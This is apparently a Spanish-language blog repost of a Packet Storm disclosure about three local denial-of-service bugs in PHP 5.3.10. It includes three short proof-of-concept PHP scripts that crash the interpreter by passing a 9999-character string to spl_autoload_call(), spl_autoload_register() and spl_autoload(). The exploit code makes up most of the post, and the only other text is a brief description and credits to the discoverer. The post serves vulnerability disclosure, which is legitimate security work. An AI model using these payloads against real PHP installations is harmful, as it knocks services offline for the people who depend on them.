Denegación de servicio en PHP 5.3.10


Se han descubierto tres nuevas vulnerabilidades que provocan denegación de servicio en PHP 5.3.10. Estas se dan a nivel local al llamar a a las funciones spl_autoload_call() , spl_autoload_register() o spl_autoload() con un parámetro de longitud igual o superior a 9999 caracteres.

spl_autoload_call()

[php]
<?php
#####################################################################
## PHP 5.3.10 spl_autoload_call() Local Denial of Service
## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10
## Date: 02/06/2012
## Local Denial of Service
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## ISRAEL
## http://www.0x31337.net
#####################################################################

$buffer = str_repeat("A",9999);
spl_autoload_call($buffer);
?>
[/php]

spl_autoload_register()

[php]
<?php
#####################################################################
## PHP 5.3.10 spl_autoload_register() Local Denial of Service
## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10
## Date: 02/06/2012
## Local Denial of Service
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## ISRAEL
## http://www.0x31337.net
#####################################################################

$buffer = str_repeat("A",9999);
spl_autoload_register($buffer);

## Or..
# spl_autoload_register($buffer,1,1); #Should work too.
?>
[/php]

spl_autoload()

[php]
<?php
#####################################################################
## PHP 5.3.10 spl_autoload() Local Denial of Service
## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10
## Date: 02/06/2012
## Local Denial of Service
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## ISRAEL
## http://www.0x31337.net
#####################################################################

$buff = str_repeat("A",9999);
spl_autoload($buff);
?>
[/php]
Vía http://packetstormsecurity.org
Publicado por en
Etiquetas:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)